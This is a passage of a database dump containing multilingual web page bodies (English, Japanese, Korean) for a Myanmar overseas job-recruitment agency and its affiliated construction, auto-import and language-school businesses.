Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">목표는 최고의</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">인재를</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">양성하고</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">국제 푶준 회사로서</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">해외</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">취업</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">기회를</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">발굴하는</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">것입니다</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\">.</span><o:p></o:p></p><p class=\"MsoNormal\">&nbsp;</p><p class=\"MsoNormal\">&nbsp;</p><p class=\"MsoNormal\">&nbsp;</p><img src=\"/sites/default/files/inline-images/Screenshot%202023-07-31%20121902_1.png\" data-align=\"left\" data-entity-uuid=\"348bbcce-ca79-4848-842e-00f17e500578\" data-entity-type=\"file\"><p class=\"MsoNormal\">&nbsp;</p><blockquote><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>미션</u></strong></span><o:p></o:p></p></blockquote><p><strong>대행사와 고객 간의 상호, 존중, 정직, 신뢰로 오래 지속되는 관계를 구축하기 .</strong><br><strong>다른 대행사에 비하면 고객들이 선호하는 선두 에이전시 되기 위해.</strong><br><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 26, 309, 'en', 0, '<p>Our company is established with the aim of creating a company that meets the international standards, providing training and employment opportunities to the future youth who want to work abroad according to the current conditions and needs of Myanmar.</p><p>In order to ensure that there is no harm between employers and employees, we are trying to select and produce workers in accordance with the standards of the International Recruitment Integrity System (IRIS) established by the International Organization for Migration (IOM).</p>', '', 'full_html'),
('page', 0, 26, 309, 'ja', 0, '<p>我々はミャンマーの現状を見抜き、海外で働きたい生徒達の訓練、能力の高い生徒達を生み出し、国際スタンダードに負けない会社になることに目指しております。</p><p>会社と労働者の間に損失がないようにInternational Organization for Migration (IOM)が定めたInternational Recruitment Integrity System(IRIS)に合った基準で管理しております。<o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 26, 309, 'ko', 0, '<p>우리 회사는 현재 미얀마의 상황과 필요에 따라 외국에서 일하고 싶은 청년들에게 훈련과 해외취업 기회 제공을 목표로 설립되었습니다.</p><p>고용주와 근로자 사이에 피해가 없도록 국제이주기구(IOM)에서 제정한 국제채용청렴제도(IRIS) 기준에 따라 근로자를 선발하고 생산하도록 노력하고 있습니다.<o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 27, 273, 'en', 0, '<p><span style=\"font-family:&quot;Calibri&quot;,sans-serif;font-size:11.0pt;line-height:107%;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-language:MY;mso-bidi-theme-font:minor-bidi;mso-fareast-font-family:Calibri;mso-fareast-language:EN-US;mso-fareast-theme-font:minor-latin;mso-hansi-theme-font:minor-latin;\"><img src=\"/sites/default/files/inline-images/0-02-06-707e64535820a2e01c60182bae8fafed776a80b5294ffbbf63dd3a3bb680ab39_87337caf547d9cc.jpg\" data-entity-uuid=\"ab23ef9a-b19e-44cb-859b-9e243b2192c9\" data-entity-type=\"file\" width=\"100%\">New Comet Group of Co.,Ltd was founded in 1996 and started operation with Branches Companies as Follow:</span></p><ol><li class=\"MsoListParagraphCxSpFirst\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;New Comet Construction Co.Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;New Zayya Shwe Pyi Construction Co.,Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;Aung Nay Wun Construction Co.,Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;Zeya New Comet Auto Sale &amp; Services Co.,Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-family:&quot;Calibri&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-language:MY;mso-bidi-theme-font:minor-bidi;mso-fareast-font-family:Calibri;mso-fareast-language:EN-US;mso-fareast-theme-font:minor-latin;mso-hansi-theme-font:minor-latin;\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;New Comet Trading Agency Co.,Ltd</span></li></ol><hr><blockquote><ol><li class=\"MsoListParagraph\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><strong>&nbsp; &nbsp; &nbsp; &nbsp;New Comet Construction Co.Ltd</strong></li></ol></blockquote><p class=\"MsoNormal\">New comet construction Co.Ltd was founded in 2004 with company Licence ( 295/ 2004-2005) and started operation construction projects , Import and sale of construction and industrial machinery and vehicles based in Yangon, Mandalay, Ayawaddy, Nay Pyi Taw, Sagaing States etc.&nbsp;<o:p></o:p></p><p class=\"MsoNormal\">Some of the construction works completed by us in the financial year (2013-2014) and (2014-2015) by our ``New Comet Construction\'\' Co.,Ltd are:&nbsp;<o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">• <span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;\">Nationalities Youth Resource Development Degree College ( Sagaing)</span><o:p></o:p></p><p class=\"MsoNormal\">• Sagaing University (two storyed classroom)<o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">• <span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;\">A joint venture housing project between Road Transport Administration Department and NEW COMET Construction Co.Ltd</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">In addition to the above projects :&nbsp;</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Departmental and private building construction and repair works</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Construction of affordable housing for ex-employees in cities in Irrawaddy Region</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Architectural design modeling</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Construction of buildings and roads and bridges continues to be carried out according to standards with veteran consultants, professional engineers, management office staff, project supervisors from the region and other regions, skilled workers and modern equipment</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Our company has been doing charity work for as long as it is capable of designing and calculating the strength of related religious buildings, hospitals and schools.</span></p><img data-entity-uuid=\"476f718a-71af-45ea-a748-e716dfac9105\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-9aaf4a3a51396d08d35ed97687363cc74e6be060b4c3d2518ed62a91236fefb8_acbd8288eb4f0f54.jpg\" data-align=\"center\"><img data-entity-uuid=\"184a0e03-a0df-4f42-96e8-bbc39c8b4138\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-0ad4905d248f688ca70ebadf72247649a5fbd5deba8990d0e19d2e359e1c21d7_6c1588d46f55cbd7.jpg\" data-align=\"center\"><blockquote><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">2. <strong>New Zayya Shwe Pyi Construction Co.,Ltd</strong><o:p></o:p></p></blockquote><p class=\"MsoNormal\"><span style=\"mso-spacerun:yes;\">&nbsp;</span>New Zayya Shwe Pyi Construction Co.,Ltd was founded in May 30<sup>th</sup>, 2001 with Company Registration Number (191/ 2001-2002). We standed as one of the trustful companies and completed projects in educational, health care, industrial buildings, private housing, high rise condominium in both public and private sectors.&nbsp;<o:p></o:p></p><p class=\"MsoNormal\">Throughout our existence, we had been praised by our clients for our attention to detail and our ability to provide knowledge driven and cost saving solutions for the complex construction projects. We built projects in areas such as Education, Health Care, Industrial Housing.<o:p></o:p></p><p class=\"MsoNormal\">Our Services are:<o:p></o:p></p><ul style=\"list-style-type:disc;\"><li class=\"MsoListParagraphCxSpFirst\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Pre Construction-Service&nbsp;<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;General Contractor<o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Design Builder</li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-family:&quot;Calibri&quot;,sans-serif;font-size:11.0pt;line-height:107%;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-language:MY;mso-bidi-theme-font:minor-bidi;mso-fareast-font-family:Calibri;mso-fareast-language:EN-US;mso-fareast-theme-font:minor-latin;mso-hansi-theme-font:minor-latin;\">&nbsp; &nbsp; &nbsp; Construction Manager</span></li></ul><img data-entity-uuid=\"0cc6deae-826a-47f2-acc6-98e7502b7fc9\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-0a244db364d6f33057f99a6d2355664418f691bf95ce66f48dca0640fcf3aeac_764d2f52d6df55ab.jpg\" data-align=\"center\"><blockquote><p>3. <strong>Aung Nay Wun Construction Co., Ltd</strong></p></blockquote><p>Aung Nay Wun Construction Co.,Ltd was founded in 2005 with company registration Number (265/ 2005-2006) emphasizing in residential, commercial, construction and interior design in private and government sectors. Some of the projects we have constructed are as follow:&nbsp;<o:p></o:p></p><ul style=\"list-style-type:disc;\"><li class=\"MsoListParagraphCxSpFirst\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Nay-Pyi-Taw Staff Housing Project<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Yandanar Pone College in Mandalay</li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Fire Station in Myawaddy Division &nbsp; &nbsp;&nbsp;</li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Basic Education Middle, High Schools in various towns. (32 in total)</li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; Fair-priced Housing Projects&nbsp;</li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; Private Housing&nbsp;</li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; Projects in Health Industry</li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; Two storied Building (Technical School At Bo-Ka-Lay)&nbsp;</li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; Two Storied RCC Building (MaUPin)</li></ul><img data-entity-uuid=\"b6c777bb-d64f-410a-b60a-7d6444407cae\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-f8672f3444e1950fa35217b49307677ae6d33e2d99603399662eaae4f9d39190_6e3195189a60fe3d.jpg\" data-align=\"center\"><blockquote><p>4. <strong>Zeya New Comet Auto Sale &amp; Services Co.,Ltd</strong><o:p></o:p></p></blockquote><p class=\"MsoListParagraphCxSpFirst\">Our Auto Trade Company was built from 1987 by buying permit of crew permit and importation and brother company New Comet Company Ltd. At 1990 established and private car, saloon car, truck car, bus car and spare-part importation from Japan. Besides Zeya New Comet Company we cooperate with other NEW ZAYYA SHWEPYI Company, AUNG NAY WIN Company, Tai Myint Aung Company made importation of private car, truck, Bus and spare-part from Japan for (25) years with the employment of 100 workers and purchase of import permit from Ministry of Commerce.&nbsp;<o:p></o:p></p><p class=\"MsoListParagraphCxSpLast\">Our ZEYA NEW COMET Auto Services Company appointed expert staff and import Japan Car for smooth operation for customer satisfaction.</p><img data-entity-uuid=\"022e7f79-c383-4bc9-a80c-5fe2935b1fa8\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-b404a964ab43ea63041db9368826ecbe1484b759d5971f33ff0104899e5df0c3_19a512351d35b26.jpg\" data-align=\"center\"><img data-entity-uuid=\"eb4b839e-2a0e-4afe-941e-2cd62886e291\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-0885134294f5bb4b35f486d660969a7bd486b5056a8cafeade7e5a8fd001dd13_c2c93978c7b2c845.jpg\" data-align=\"center\"><img data-entity-uuid=\"51693869-fa17-435c-962a-ec4967eff348\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-c6ac45848a344b2aa9f02c9e018906b5c2d5c20f7b93b2bf375667e999512d9a_97a7d435e643c3e9.jpg\" data-align=\"center\"><hr><p class=\"MsoListParagraphCxSpLast\"><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 27, 273, 'ja', 0, '<p>&nbsp;&nbsp; <img src=\"/sites/default/files/inline-images/0-02-06-707e64535820a2e01c60182bae8fafed776a80b5294ffbbf63dd3a3bb680ab39_87337caf547d9cc_0.jpg\" data-entity-uuid=\"1153a72f-a283-46f1-a351-b0da59976c09\" data-entity-type=\"file\" width=\"100%\"> 「ニュー コメット グループ企業」は 1996 年に設立され、以下の支店で組織されています。<br>1.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー コメット コンストラクション株式会社」<br>2.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー ゼヤー シュエ ピィーコンストラクション株式会社」<br>3.&nbsp;&nbsp;&nbsp;&nbsp;「アウン ネイ ワォンコンストラクション株式会社」<br>4.&nbsp;&nbsp;&nbsp;&nbsp;「ゼヤー ニュー コメット オートセールスとサービス株式会社」<br>5.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー コメット トレーディング エージェンシー 株式会社」</p><blockquote><h5><br>1.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー コメット コンストラクション株式会社」</h5></blockquote><p><br>当社の「ニュー コメット コンストラクション株式会社」は2004年に会社登録番号(295/2004-2005)で事業を開始し、ヤンゴン地方域、エーヤーワディ地方域、ザガイン地方域、マンダレー地方域 とネピドー連合領土を拠点に自動車販売と建設機械の輸入、建設業を営んでおります。<br>当社「ニュー コメット コンストラクション株式会社」の2013-2014年と2014-2015年の竣工工事の一部は以下の通りです。<br>-&nbsp;&nbsp;&nbsp;&nbsp;国籍青少年資源開発大学(ザガイン)<br>-&nbsp;&nbsp;&nbsp;&nbsp;ザガイン大学 (教育と学習のための2階建ての建物)<br>-&nbsp;&nbsp;&nbsp;&nbsp;道路交通総局と「チェタゴンティッ建設会社」の住宅プロジェクト協力<br>&nbsp; &nbsp; &nbsp;上記の活動に加えて、</p><p>-&nbsp;&nbsp;&nbsp;&nbsp;政府機関および民間の建物の修繕工事<br>-&nbsp;&nbsp;&nbsp;&nbsp;エーヤーワディ地方域で元従業員向けに手頃な価格の住宅を建設<br>-&nbsp;&nbsp;&nbsp;&nbsp;建築設計図<br>-&nbsp;&nbsp;&nbsp;&nbsp;当社は、専門コンサルタント、専門作業員、管理責任者、工事監督者、その<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;他国内外の労働者とともに、基準に沿って最新化された資機材により、<br>&nbsp; &nbsp; &nbsp;建物、道路、橋梁の建設工事を行っております。<br>-&nbsp;&nbsp;&nbsp;&nbsp;当社は理念建築、病院、学校の設計図作成、強度計算などの慈善事業を可能<br>&nbsp;&nbsp;&nbsp;&nbsp;な限り手掛けさせていただきました。</p><img data-entity-uuid=\"b152793a-2ada-4b92-a557-2a29e7d92dc8\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-9aaf4a3a51396d08d35ed97687363cc74e6be060b4c3d2518ed62a91236fefb8_acbd8288eb4f0f54_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"f43007e3-a9a0-4eaf-b39b-dcd0fc894505\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-0ad4905d248f688ca70ebadf72247649a5fbd5deba8990d0e19d2e359e1c21d7_6c1588d46f55cbd7_0.jpg\" data-align=\"center\"><blockquote><h5><br>2.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー ゼヤーシュエ ピィーコンストラクション株式会社」</h5></blockquote><p><br>&nbsp;&nbsp;&nbsp;&nbsp;当社の「ニュー ゼヤー シュエ ピィーコンストラクション株式会社」は 2000 年 5 月 30 日に設立され、会社登録番号は(191/2001-2002)です。当社は信頼できる企業の一つであり、教育、医療、産業建築、個人住宅を提供しており、政府および民間部門の両方で多くのプロジェクトが実施されています。会社の存続期間を通じて、複雑な建設プロジェクトにおける当社の細部へのこだわりと専門知識。 当社はコスト削減ソリューションを提供する能力でクライアントから多くの賞賛を受けています。教育、医療、工業用住宅など、多くのプロジェクトを建設してきました。<br>私たちは、<br>&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;建設前サービス<br>&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;土建屋<br>&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;デザインビルダー<br>&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;建設部長を提供させていただきました。</p><img data-entity-uuid=\"cff390cb-2394-4f0a-8620-d9fc3926bd55\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-0a244db364d6f33057f99a6d2355664418f691bf95ce66f48dca0640fcf3aeac_764d2f52d6df55ab_0.jpg\" data-align=\"center\"><blockquote><h5><br>3.&nbsp;&nbsp;&nbsp;&nbsp;「アウン ネイ ワォンコンストラクション株式会社」</h5></blockquote><p><br>&nbsp;&nbsp;&nbsp;&nbsp;当社の「アウン ネイ ワォンコンストラクション株式会社」は 2005年に設立され、会社登録番号は(265/2005-2006)です。同社は、民間および政府部門で住宅建築、商業建築、インテリアデザインのプロジェクトに従事しています。私たちのプロジェクトは以下の通りです。<br>-&nbsp;&nbsp;&nbsp;&nbsp;ネピドー職員住宅プロジェクト<br>-&nbsp;&nbsp;&nbsp;&nbsp;マンダレー ヤダナポン大学<br>-&nbsp;&nbsp;&nbsp;&nbsp;ミャワディ地域消防署<br>-&nbsp;&nbsp;&nbsp;&nbsp;さまざまな郡区の基礎教育中/高等学校。 (計32都市)<br>-&nbsp;&nbsp;&nbsp;&nbsp;手頃な価格の住宅プロジェクト<br>-&nbsp;&nbsp;&nbsp;&nbsp;民間住宅<br>-&nbsp;&nbsp;&nbsp;&nbsp;2階建ての建物 (ボガレ工科大学)<br>-&nbsp;&nbsp;&nbsp;&nbsp;RCC 2階建ての建物(マウビン)</p><img data-entity-uuid=\"aaf822af-68e4-43a7-a244-1899d9476ebb\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-f8672f3444e1950fa35217b49307677ae6d33e2d99603399662eaae4f9d39190_6e3195189a60fe3d_0.jpg\" data-align=\"center\"><blockquote><h5><br>4.&nbsp;&nbsp;&nbsp;&nbsp;「ゼヤー ニュー コメット オートセールスとサービス株式会社」</h5></blockquote><p><br>&nbsp;&nbsp;&nbsp;&nbsp;当社の自動車商社は1987年に外国人船員の名義で輸入許可証の売買を行う個人事業として設立されました。「ニュー コメット」株式会社は1990年に設立され、「ゼヤー ニュー コメット オートセールスとサービス株式会社」の子会社です。 「家庭用自動車」「各種サルーン自動車」「各種商用トラック」「観光・輸送用各種バス」「各種機械」を日本より直接仕入れ、輸入販売を開始いたしました。<br>当社「ゼヤー ニュー コメット オートセールスとサービス株式会社」には、業務を促進する資格のある従業員がいます。 お客様に十分にご満足いただけるよう、良い車を日本から直輸入しております。</p><img data-align=\"center\" data-entity-uuid=\"e3414a35-d7bd-4d16-9069-3652b772fd36\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-b404a964ab43ea63041db9368826ecbe1484b759d5971f33ff0104899e5df0c3_19a512351d35b26_0.jpg\"><img data-entity-uuid=\"5bb90568-27fc-4835-a442-5d8abd7646c8\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-0885134294f5bb4b35f486d660969a7bd486b5056a8cafeade7e5a8fd001dd13_c2c93978c7b2c845_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"65484fb2-de63-4620-ab54-e3a7fb7fe146\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-c6ac45848a344b2aa9f02c9e018906b5c2d5c20f7b93b2bf375667e999512d9a_97a7d435e643c3e9_0.jpg\" data-align=\"center\"><hr>', '', 'full_html'),
('page', 0, 27, 273, 'ko', 0, '<img data-entity-uuid=\"8ef82604-9360-40e2-94b8-357908e9ce24\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-707e64535820a2e01c60182bae8fafed776a80b5294ffbbf63dd3a3bb680ab39_87337caf547d9cc_1.jpg\" width=\"100%\"><p>Coming soon...</p>', '', 'full_html'),
('activities', 0, 28, 220, 'en', 0, '<p><img src=\"/sites/default/files/inline-images/0-02-05-5e4404bcc64196bb51feea8508787ee677c68fd420c2625eaf507202a3c0d8b4_47c196490e83da01.jpg\" data-entity-uuid=\"570f052a-89d0-45fd-b1b5-0aac8e5be6dd\" data-entity-type=\"file\"></p><p>HIT LANGUAGE CENTER has started teaching Korean language courses and Japanese language courses in cooperation with NEW COMET TRADING AGENCY. Those who want to learn can register quickly.<br>(We have searched for foreign job opportunities as quickly as possible and have already taught you how to speak effectively)</p><p>HIT LANGUAGE CENTER (09775556677, 09950947491, 095015742, 09965104911,<br>01-8393300, 01-8393344)</p>', '', 'full_html'),
('activities', 0, 28, 220, 'ja', 0, '<p><img src=\"/sites/default/files/inline-images/0-02-05-5e4404bcc64196bb51feea8508787ee677c68fd420c2625eaf507202a3c0d8b4_47c196490e83da01.jpg\" data-entity-uuid=\"570f052a-89d0-45fd-b1b5-0aac8e5be6dd\" data-entity-type=\"file\"></p><p>HIT LANGUAGE CENTER」は、NEW COMET TRADING AGENCYとの協力のもと、韓国語コースと日本語コースの教室を開始しました。学びたい方は、早めに登録してください。<br>（私たちは外国の仕事の機会をできるだけ早く検索し、すでに効果的な会話方法を教えています）</p><p>HIT LANGUAGE CENTER（09775556677、09950947491、095015742、09965104911、01-8393300、01-8393344）</p>', '', 'full_html'),
('activities', 0, 28, 220, 'ko', 0, '<p><img src=\"/sites/default/files/inline-images/0-02-05-5e4404bcc64196bb51feea8508787ee677c68fd420c2625eaf507202a3c0d8b4_47c196490e83da01.jpg\" data-entity-uuid=\"570f052a-89d0-45fd-b1b5-0aac8e5be6dd\" data-entity-type=\"file\"></p><p>HIT LANGUAGE CENTER」는 NEW COMET TRADING AGENCY와의 협력으로 한국어 코스와 일본어 코스를 개설했습니다. 관심있는 분들은 빠르게 등록해주세요.<br>(우리는 외국의 취업 기회를 최대한 빨리 찾아드리고, 이미 효과적인 대화 방법을 가르치고 있습니다)</p><p>HIT LANGUAGE CENTER (09775556677, 09950947491, 095015742, 09965104911, 01-8393300, 01-8393344)</p>', '', 'full_html'),
('activities', 0, 29, 223, 'en', 0, '<p>The person in charge of the Korean side of NEW COMET TRADING AGENCY, Mr.Hong explained the question of when you can answer the KOSHIPA TEST estimate at HIT LANGUAGE CENTER. (8-7-2023)<br><img src=\"/sites/default/files/inline-images/0-02-05-f935a538b3bc910e8946314ccd2ebbcd440d5782d4d6dae79e63820e536c5299_b168dc980f6026aa.jpg\" data-entity-uuid=\"48a96694-743b-4594-a437-fb064c1b9c17\" data-entity-type=\"file\"></p>', '', 'full_html');
INSERT INTO `node__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('activities', 0, 29, 223, 'ja', 0, '<p>NEW COMET TRADING AGENCYの韓国側担当者、Mr.HongがHIT LANGUAGE CENTERでKOSHIPA TESTの評価結果が得られる見込みの日について説明しました。（2023年7月8日）<br><img src=\"/sites/default/files/inline-images/0-02-05-f935a538b3bc910e8946314ccd2ebbcd440d5782d4d6dae79e63820e536c5299_b168dc980f6026aa.jpg\" data-entity-uuid=\"48a96694-743b-4594-a437-fb064c1b9c17\" data-entity-type=\"file\"></p>', '', 'full_html'),
